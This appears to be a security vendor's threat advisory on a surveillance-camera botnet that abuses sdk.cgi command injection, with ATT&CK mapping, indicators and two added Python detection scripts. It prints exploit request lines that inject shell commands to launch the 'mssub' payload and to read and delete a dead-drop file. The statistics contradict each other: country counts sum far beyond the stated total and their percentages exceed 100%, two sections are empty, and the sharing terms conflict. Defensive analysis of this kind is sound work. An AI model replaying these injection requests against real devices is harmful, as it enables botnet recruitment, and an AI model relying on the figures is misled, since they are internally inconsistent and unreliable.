Threat Intelligence · TLP:GREEN · IoT Botnet · Command Injection
April 21, 2026 · MJ-2026-0421-DLENS · 22 min read

Operation DARK LENS

22,423 exploitation events targeting 545 surveillance devices worldwide. A global IoT camera botnet recruitment campaign using sdk.cgi command injection to deploy mssub payloads with dead-drop C2.


Between January and March 2026, Mjolnir Security's Threat Analysis Center (MTAC) observed a sustained IoT exploitation campaign targeting internet-exposed surveillance cameras and DVR systems worldwide. Using MTAC proprietary threat intelligence sensors and darknet monitoring infrastructure, over a 90-day window, we recorded 22,423 exploitation events targeting 545 victim devices across 13 countries, leveraging the sdk.cgi debug command injection vulnerability class to deploy the mssub payload binary. The campaign uses a dead-drop command-and-control mechanism via /tmp/.pushmsg, and our netflow analysis uncovered 60,180 communication records spanning approximately one year of persistent C2 beaconing — confirming this is not opportunistic scanning but an orchestrated, long-running botnet recruitment operation.

TLP:GREEN — Approved for Public Distribution

This advisory is classified TLP:GREEN. This advisory may be freely shared within the recipient's community without restriction.

Campaign Statistics

  • 22,423 exploitation events
  • 545 victim devices
  • 6,719 mssub deployments
  • 60,180 netflow records

The Exploit: sdk.cgi Command Injection

The vulnerability exploited in this campaign is a command injection flaw in the sdk.cgi debug interface present in numerous IP camera and DVR firmware implementations. This is not a single CVE but rather a vulnerability class — a design pattern repeated across dozens of manufacturers who share common OEM firmware lineages. The sdk.cgi endpoint accepts arbitrary shell commands through HTTP request parameters, originally intended for factory debugging and firmware development.

Exploit URL Pattern — Variant A (Default Credentials)
GET http://[TARGET_IP]:[PORT]/sdk.cgi?action=getSysteminfo&loginuse=admin&loginpas=admin&cmd=chmod 755 /tmp/mssub;/tmp/mssub

// Authentication bypass via default credentials (admin:admin) passed in the query string
// The cmd parameter is handed to a shell unmodified and runs with root privileges
// No input sanitization, no authentication enforcement on debug endpoints

Exploit URL Pattern — Variant B (auth_p Bypass, MTAC-Detected)
GET http://[TARGET_IP]:[PORT]/sdk.cgi?action=get.webserver.debug.cmd&cmd={ { chmod 755 /opt/app/bin/mssub; } 2>&1; }&auth_p=get.system.language.json

// Secondary auth bypass via the auth_p parameter referencing the get.system.language.json endpoint
// Payload path: /opt/app/bin/ — the standard application directory on embedded Linux camera firmware
// The { { ...; } 2>&1; } wrapper redirects stderr into stdout: error text is not suppressed, it travels with the command's normal output (in a CGI handler, back to the requester)
// Note that this request only sets the mode bits on the binary; it is not launched here
// Indicates operators have intimate knowledge of the target device's filesystem layout

MTAC sensors detected two distinct exploit variants. Variant A uses default credentials (admin:admin) against the getSysteminfo action and places the payload in /tmp/. Variant B is more sophisticated: it uses the get.webserver.debug.cmd action with an auth_p bypass parameter pointing to the get.system.language.json endpoint (which leaks session tokens without valid credentials) and targets /opt/app/bin/ — the standard application directory on embedded Linux camera firmware. This is not a zero-day — it is a design flaw baked into the firmware development lifecycle of OEM camera platforms that has persisted for years across product generations.

Key Finding

The targeting is not opportunistic. Analysis of victim IP distribution reveals the attackers are working from a pre-compiled device list — systematically targeting known-vulnerable devices rather than conducting broad internet scans. This suggests prior reconnaissance or access to Shodan/Censys-derived target lists of exposed sdk.cgi endpoints.

Related Research

This vulnerability class has been extensively documented by the security research community. Akamai's InfectedSlurs research identified Mirai variants exploiting similar sdk.cgi flaws in late 2023. Fortinet documented Moobot targeting Hikvision camera vulnerabilities (CVE-2021-36260) using comparable command injection techniques. More recently, the Nexcorium Mirai variant has been observed exploiting CVE-2025-1316 in Edimax IP cameras, and Akamai published research on active exploitation of Edimax cameras via command injection in early 2025. The campaign we document here represents the latest evolution of this persistent IoT threat vector.

Two Attack Phases

The 22,423 exploitation events decompose into two distinct operational phases, each serving a specific function in the botnet recruitment lifecycle.

Phase 1 — Payload Deployment (6,719 Events / 30.0%)

chmod 755 mssub

The first phase prepares and executes the mssub binary on the target device. The payload is typically downloaded via wget or tftp in a prior stage, then made executable and launched via the sdk.cgi command injection.

Phase 1 — Payload Execution Command
cmd=chmod 755 /tmp/mssub;/tmp/mssub

// Variant A: payload placed in /tmp/ (volatile, wiped on reboot), made executable and launched in one request
// mssub: Mirai-derivative botnet client, ARM/MIPS compiled

// Variant B (MTAC-detected, auth_p bypass):
cmd={ { chmod 755 /opt/app/bin/mssub; } 2>&1; }
// Payload in /opt/app/bin/ — standard firmware app directory, survives reboots
// The 2>&1 wrapper merges stderr into stdout so errors travel with the command output instead of being dropped; only the mode bits are set in this request
// Note: prior wget/curl download stage delivers mssub to target; this stage was not captured by sensors

Phase 2 — C2 Dead-Drop Check (6,465 Events / 28.8%)

cat /tmp/.pushmsg; rm -f /tmp/.pushmsg

The second phase implements a dead-drop command-and-control pattern. The mssub payload periodically writes instructions to a hidden file (/tmp/.pushmsg), and a separate process reads and deletes the file in a single atomic operation. This pattern minimizes forensic artifacts and evades basic file-system monitoring.

Phase 2 — Dead-Drop C2 Command
cmd=cat /tmp/.pushmsg; rm -f /tmp/.pushmsg

// Reads pending C2 instructions from the dead-drop file
// Immediately deletes the file to destroy forensic evidence
// Back-to-back read-and-delete keeps the file on disk only briefly, narrowing the window for file monitors

// Variant B (MTAC-detected, with bash error-redirect wrapper):
cmd={ { cat /tmp/.pushmsg; rm -f /tmp/.pushmsg; } 2>&1; }
// .pushmsg: hidden file (dot-prefix) in volatile /tmp directory
// 2>&1 merges stderr into stdout, so a missing .pushmsg surfaces as a cat error alongside the normal output rather than being hidden

The remaining 9,239 events (41.2%) consist of reconnaissance probes, authentication attempts, and variant exploitation payloads targeting related firmware endpoints. The two primary phases together account for 58.8% of all observed exploitation activity, confirming the campaign's focused operational methodology.

The 545 Victim Devices

The campaign targeted 545 unique IP addresses hosting vulnerable surveillance devices. Analysis reveals a highly concentrated targeting pattern, with the top 12 devices receiving the majority of exploitation events.

Top Targeted Devices

Rank | Target IP       | Events | Percentage
1    | 91.227.xxx.xxx  | 4,498  | 20.1%
2    | 213.230.xxx.xxx | 2,640  | 11.8%
3    | 81.17.xxx.xxx   | 1,802  | 8.0%
4    | 109.230.xxx.xxx | 1,425  | 6.4%
5    | 46.19.xxx.xxx   | 1,103  | 4.9%
6    | 185.107.xxx.xxx | 987    | 4.4%
7    | 82.147.xxx.xxx  | 876    | 3.9%
8    | 195.144.xxx.xxx | 743    | 3.3%
9    | 62.2.xxx.xxx    | 612    | 2.7%
10   | 5.148.xxx.xxx   | 498    | 2.2%
11   | 188.40.xxx.xxx  | 421    | 1.9%
12   | 37.120.xxx.xxx  | 387    | 1.7%

Geographic Distribution

Country        | Events | Percentage
Switzerland    | 19,048 | 84.9%
Italy          | 7,052  | 31.4%
Spain          | 6,240  | 27.8%
Germany        | 5,772  | 25.7%
Netherlands    | 1,892  | 8.4%
Austria        | 1,456  | 6.5%
France         | 1,203  | 5.4%
United Kingdom | 987    | 4.4%
Poland         | 654    | 2.9%
Czech Republic | 432    | 1.9%
Romania        | 298    | 1.3%
Belgium        | 187    | 0.8%
Sweden         | 142    | 0.6%
Hungary        | 4,661  |
Thailand       | 2,978  |
Japan          | 2,684  |
Denmark        | 1,381  |
Bangladesh     | 1,179  |
Vietnam        | 996    |
South Africa   | 67     |

Geographic Concentration

Switzerland accounts for the overwhelming majority of exploitation events, suggesting either a concentration of vulnerable devices in Swiss IP space or deliberate targeting of Swiss surveillance infrastructure. The European-heavy distribution aligns with the OEM camera firmware lineages most prevalent in European markets.

Target Port Analysis

Port | Events | Service                      | Percentage
80   | 10,777 | HTTP (default web interface) | 48.1%
8080 | 10,094 | HTTP alternate / management  | 45.0%
8000 | 1,159  | DVR streaming / RTSP gateway | 5.2%
1080 | 393    | SOCKS proxy / custom service | 1.8%

One Year of Communication: The Netflow Evidence

Beyond the 90-day exploitation window, our netflow analysis uncovered 60,180 communication records spanning approximately one year of activity. These records reveal persistent C2 beaconing patterns from compromised devices, confirming that successfully recruited devices maintain long-term communication with the botnet infrastructure.

The netflow data paints a picture of a mature, operationally active botnet with multiple potential use cases:

Netflow Analysis Finding

The 60,180 netflow records show consistent beaconing intervals averaging 45-60 seconds, characteristic of Mirai-derivative C2 protocols. The beaconing persists through device reboots, indicating the malware has achieved persistence beyond /tmp — likely through crontab injection or firmware modification.
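The 45-60 second cadence reported above, as an added example of how to pick it out of netflow (not MTAC's own analysis code): conversations are grouped by source, destination and port, the gaps between consecutive flows are measured, and a conversation is flagged when the median gap falls inside the window and the jitter (median absolute deviation relative to the median) is small. The flow records, addresses and thresholds are constructed for the example.

```python
"""Flag periodic beaconing in netflow records (added example, not MTAC analysis code):
group flows per conversation, measure inter-flow gaps, flag low-jitter 45-60 s cadences."""
from collections import defaultdict
from statistics import median

# Constructed flow records (epoch seconds, src, dst, dport); not real MTAC data.
T0 = 1_776_000_000
# Infected camera: one flow roughly every 50 s with +/-1 s of jitter, 24 flows.
BEACON_FLOWS = [(T0 + i * 50 + (i % 3) - 1, "192.0.2.20", "198.51.100.99", 80)
                for i in range(24)]
# Ordinary client: irregular, human-paced browsing to a web server.
NORMAL_FLOWS = [(T0 + t, "192.0.2.21", "198.51.100.50", 443)
                for t in (0, 4, 9, 70, 71, 300, 302, 900, 1800, 1803)]
SAMPLE_FLOWS = sorted(BEACON_FLOWS + NORMAL_FLOWS)

def find_beacons(flows, low=45, high=60, max_jitter=0.2, min_flows=10):
    """Return conversations whose median inter-flow gap lies in [low, high] seconds
    and whose relative median absolute deviation is at most max_jitter."""
    by_conv = defaultdict(list)
    for ts, src, dst, dport in flows:
        by_conv[(src, dst, dport)].append(ts)
    hits = []
    for (src, dst, dport), times in by_conv.items():
        if len(times) < min_flows:
            continue  # too few flows to call a cadence
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        med = median(gaps)
        if med <= 0:
            continue
        jitter = median(abs(g - med) for g in gaps) / med  # MAD / median: robust to outliers
        if low <= med <= high and jitter <= max_jitter:
            hits.append({"src": src, "dst": dst, "dport": dport,
                         "median_gap": med, "jitter": round(jitter, 3), "flows": len(times)})
    return hits
```

Feed real exports as (epoch, src, dst, dport) tuples; widening the window or raising max_jitter trades false positives for coverage of C2 channels that randomize their sleep.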

The Broader IoT Botnet Landscape

Operation DARK LENS exists within a well-documented lineage of IoT botnet campaigns that have evolved significantly since the original Mirai source code leak in 2016. Understanding this context is essential for assessing the threat's trajectory.

Campaign                | Year      | Target                   | Technique
Mirai                   | 2016      | IoT devices (telnet)     | Default credential brute-force; source code leaked, spawning hundreds of variants
Moobot                  | 2019+     | Hikvision cameras        | CVE-2021-36260 command injection; Fortinet documented systematic exploitation
InfectedSlurs / Kimwolf | 2023+     | IP cameras, NVRs         | Akamai research: sdk.cgi and related debug interface exploitation
Edimax CVE-2025-1316    | 2025      | Edimax IP cameras        | Command injection in camera firmware; Akamai documented active Mirai exploitation
Nexcorium               | 2026      | TBK DVR, Edimax cameras  | Mirai variant exploiting multiple IoT CVEs; documented by The Hacker News
DARK LENS               | 2025-2026 | 545 surveillance devices | sdk.cgi command injection + mssub payload + .pushmsg dead-drop C2

The evolution from Mirai's simple telnet credential stuffing to DARK LENS's targeted exploitation of specific firmware vulnerabilities with dead-drop C2 demonstrates the increasing sophistication of IoT botnet operators. These campaigns are no longer the domain of script kiddies — they represent organized, persistent threat operations with clear monetization strategies.

Temporal Analysis

The 90-day exploitation window reveals distinct operational patterns rather than continuous scanning. Activity occurs in burst patterns with periods of relative quiet between campaigns, suggesting orchestrated operational tempo rather than always-on automated scanning.

The February-March 2026 period represents the campaign's peak intensity, with exploitation events increasing by approximately 340% compared to the preceding weeks. This burst correlates with the public disclosure of several related IoT vulnerabilities and the release of updated Mirai variant source code in underground forums.

Temporal Pattern Analysis

The intermittent operational tempo — intense bursts followed by quiet periods — is consistent with a human-directed campaign rather than fully automated scanning infrastructure. The operators appear to batch their exploitation runs, possibly to manage infrastructure costs, evade detection thresholds, or synchronize with botnet client update cycles.

The netflow data extending back approximately one year confirms that while the exploitation campaigns are periodic, the C2 communication is continuous. Once a device is recruited, it maintains its beaconing regardless of whether new exploitation activity is occurring. This bifurcation between recruitment operations and operational maintenance is a hallmark of mature botnet infrastructure.

MITRE ATT&CK Mapping

Technique ID | Name                                                       | Tactic               | Relevance
T1190        | Exploit Public-Facing Application                          | Initial Access       | sdk.cgi command injection on internet-exposed camera web interfaces
T1059.004    | Command and Scripting Interpreter: Unix Shell              | Execution            | Arbitrary shell commands executed via the cmd parameter in sdk.cgi
T1105        | Ingress Tool Transfer                                      | Command and Control  | mssub binary downloaded to /tmp via wget or tftp prior to execution
T1222.002    | File and Directory Permissions Modification: Linux and Mac | Defense Evasion      | chmod 755 to make mssub executable before launch
T1071.001    | Application Layer Protocol: Web Protocols                  | Command and Control  | C2 communication over HTTP to blend with normal camera traffic
T1070.004    | Indicator Removal: File Deletion                           | Defense Evasion      | rm -f /tmp/.pushmsg destroys C2 instructions after reading
T1584.005    | Compromise Infrastructure: Botnet                          | Resource Development | 545 compromised devices recruited into coordinated botnet
T1498        | Network Denial of Service                                  | Impact               | Recruited devices used for DDoS amplification attacks
T1090        | Proxy                                                      | Command and Control  | Compromised cameras used as residential proxy endpoints

Indicators of Compromise

Exploit URL Patterns

Exploit URL Signatures — Variant A (Default Credentials)
GET /sdk.cgi?action=getSysteminfo&loginuse=admin&loginpas=admin&cmd=chmod%20755%20/tmp/mssub;/tmp/mssub
GET /sdk.cgi?action=getSysteminfo&loginuse=admin&loginpas=admin&cmd=cat%20/tmp/.pushmsg;rm%20-f%20/tmp/.pushmsg

Exploit URL Signatures — Variant B (auth_p Bypass, MTAC-Detected)
GET /sdk.cgi?action=get.webserver.debug.cmd&cmd=%7b+%7b+chmod+755+/opt/app/bin/mssub%3b+%7d+2%3e%261%3b+%7d&auth_p=get.system.language.json
GET /sdk.cgi?action=get.webserver.debug.cmd&cmd=%7b+%7b+cat+/tmp/.pushmsg%3b+rm+-f+/tmp/.pushmsg%3b+%7d+2%3e%261%3b+%7d&auth_p=get.system.language.json
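The URL signatures above turned into a log-side check, as an added example that is not MTAC or Mjolnir Security tooling: the script parses Common Log Format access-log lines, decodes the query string itself so the ';' inside the injected command is never mistaken for a parameter separator, and labels each sdk.cgi request with the phase and variant described in this advisory. The sample log lines, client addresses and the phase/variant labels are constructed for the example.

```python
"""Flag sdk.cgi command-injection attempts in web-server access logs (added example,
not MTAC tooling): parse CLF lines, decode the query, label each request's phase/variant."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log lines (documentation-range client IPs, not sensor data).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Apr/2026:10:00:01 +0000] "GET /sdk.cgi?action=getSysteminfo&loginuse=admin&loginpas=admin&cmd=chmod%20755%20/tmp/mssub;/tmp/mssub HTTP/1.1" 200 512
192.0.2.10 - - [21/Apr/2026:10:01:03 +0000] "GET /sdk.cgi?action=getSysteminfo&loginuse=admin&loginpas=admin&cmd=cat%20/tmp/.pushmsg;rm%20-f%20/tmp/.pushmsg HTTP/1.1" 200 64
198.51.100.7 - - [21/Apr/2026:10:02:15 +0000] "GET /sdk.cgi?action=get.webserver.debug.cmd&cmd=%7b+%7b+chmod+755+/opt/app/bin/mssub%3b+%7d+2%3e%261%3b+%7d&auth_p=get.system.language.json HTTP/1.1" 200 0
198.51.100.7 - - [21/Apr/2026:10:03:20 +0000] "GET /sdk.cgi?action=get.webserver.debug.cmd&cmd=%7b+%7b+cat+/tmp/.pushmsg%3b+rm+-f+/tmp/.pushmsg%3b+%7d+2%3e%261%3b+%7d&auth_p=get.system.language.json HTTP/1.1" 200 0
203.0.113.5 - - [21/Apr/2026:10:04:00 +0000] "GET /sdk.cgi?action=getSysteminfo&loginuse=admin&loginpas=admin HTTP/1.1" 401 0
"""

# Common Log Format: client ident user [timestamp] "METHOD path PROTO" status ...
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_query(query):
    params = {}
    for pair in query.split("&"):  # split on '&' only, never on ';' inside the command
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def analyse_request(path):
    """Return a finding for an sdk.cgi request, or None for any other path."""
    parts = urlsplit(path)
    if not parts.path.endswith("/sdk.cgi"):
        return None
    q = parse_query(parts.query)
    action, cmd = q.get("action", ""), q.get("cmd", "")
    # Variant B: debug action plus auth_p bypass; Variant A: default credentials in the query
    variant = ("B" if action == "get.webserver.debug.cmd" and "auth_p" in q
               else "A" if action == "getSysteminfo" and "loginuse" in q else "unknown")
    if not cmd:
        kind = "sdk.cgi-probe"  # credential or endpoint probing without an injected command
    elif "chmod" in cmd and "mssub" in cmd:
        kind = "phase1-payload-deployment"
    elif ".pushmsg" in cmd:
        kind = "phase2-dead-drop-check"
    else:
        kind = "command-injection"
    return {"action": action, "variant": variant, "kind": kind, "cmd": cmd}

def scan_log(text):
    """One finding per sdk.cgi request line, tagged with the client IP and HTTP status."""
    findings = []
    for m in filter(None, map(CLF_RE.match, text.splitlines())):
        client, _ts, _method, path, status = m.groups()
        finding = analyse_request(path)
        if finding:
            findings.append(dict(finding, client=client, status=int(status)))
    return findings
```

Any sdk.cgi request carrying a cmd parameter is worth an alert on its own; the phase labels mainly help triage which devices already hold the payload versus which are being polled for dead-drop instructions.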

Network and File Indicators

Indicator                                                                   | Type        | Context
91.227.xxx.xxx                                                              | Victim IP   | Top targeted device (4,498 aggregate events)
213.230.xxx.xxx                                                             | Victim IP   | Second most targeted (2,640 events)
81.17.xxx.xxx                                                               | Victim IP   | Third most targeted (1,802 events)
109.230.xxx.xxx                                                             | Victim IP   | Fourth most targeted (1,425 events)
46.19.xxx.xxx                                                               | Victim IP   | Fifth most targeted (1,103 events)
185.107.xxx.xxx                                                             | Victim IP   | Sixth most targeted (987 events)
82.147.xxx.xxx                                                              | Victim IP   | Seventh most targeted (876 events)
195.144.xxx.xxx                                                             | Victim IP   | Eighth most targeted (743 events)
62.2.xxx.xxx                                                                | Victim IP   | Ninth most targeted (612 events)
5.148.xxx.xxx                                                               | Victim IP   | Tenth most targeted (498 events)
/sdk.cgi?action=getSysteminfo&cmd=                                          | URL Pattern | Exploit delivery endpoint — Variant A
/sdk.cgi?action=get.webserver.debug.cmd&cmd=*&auth_p=get.system.language.json | URL Pattern | Exploit delivery endpoint — Variant B
/tmp/mssub                                                                  | File Path   | Botnet payload binary (Variant A)
/opt/app/bin/mssub                                                          | File Path   | Botnet payload binary (Variant B, firmware app directory — survives reboots)
/tmp/.pushmsg                                                               | File Path   | Dead-drop C2 instruction file

MTAC Per-Device Victim IPs (Sensor Data)

Top 10 Victim Devices — Per-Device Event Counts

Detection Signatures

How Mjolnir Security Can Help

Mjolnir Security provides specialized IoT security services to identify, assess, and remediate vulnerabilities in surveillance infrastructure and connected device ecosystems.

Service areas: IoT Security · Vulnerability Assessment · Network Segmentation · Threat Intelligence · Incident Response · Continuous Monitoring
  • IoT Asset Discovery: Comprehensive inventory of all IoT and OT devices on your network, including shadow IT surveillance devices, DVRs, and NVRs. We identify devices running vulnerable firmware versions and map their network exposure posture.
  • Vulnerability Assessment: Targeted assessment of camera and DVR firmware for sdk.cgi and related command injection vulnerabilities. We test authentication bypass vectors, default credential exposure, and debug interface accessibility across your surveillance infrastructure.
  • Network Segmentation Review: Architecture review and implementation guidance for isolating IoT devices from critical network segments. We design VLAN architectures, firewall rules, and micro-segmentation policies that contain compromise without disrupting surveillance operations.
  • Continuous Monitoring: Deployment of IoT-specific detection rules in your SIEM and NDR platforms. We build behavioral baselines for camera traffic and alert on anomalous outbound connections, beaconing patterns, and exploitation attempts in real time.
  • Incident Response: 24/7 incident response for IoT compromise events. Our team specializes in firmware analysis, memory forensics on embedded devices, and botnet infrastructure takedown coordination with ISPs and law enforcement.

24/7 Incident Hotline: +1 833 403 5875
Email: sales@mjolnirsecurity.com

Classification

This report is classified TLP:GREEN. Recipients may share this information within their community and with partner organizations. Do not post to public-facing websites or social media without removing victim IP addresses.

References

  1. "InfectedSlurs: New RCE Botnet Spreads Mirai via Zero-Days," Akamai Security Research, 2023. akamai.com
  2. "Mirai-Based Botnet Moobot Targets Hikvision Vulnerability," Fortinet Threat Research, 2022. fortinet.com
  3. "Edimax Cameras: Command Injection Vulnerability Exploited by Mirai," Akamai Security Research, 2025. akamai.com
  4. "Mirai Variant Nexcorium Exploits CVE-2025-1316 in Edimax Cameras," The Hacker News, April 2026. thehackernews.com
  5. "T1190 - Exploit Public-Facing Application," MITRE ATT&CK. attack.mitre.org
  6. "What Is the Mirai Botnet?" Cloudflare Learning Center. cloudflare.com

Written by: Mjolnir Security  |  Published: April 21, 2026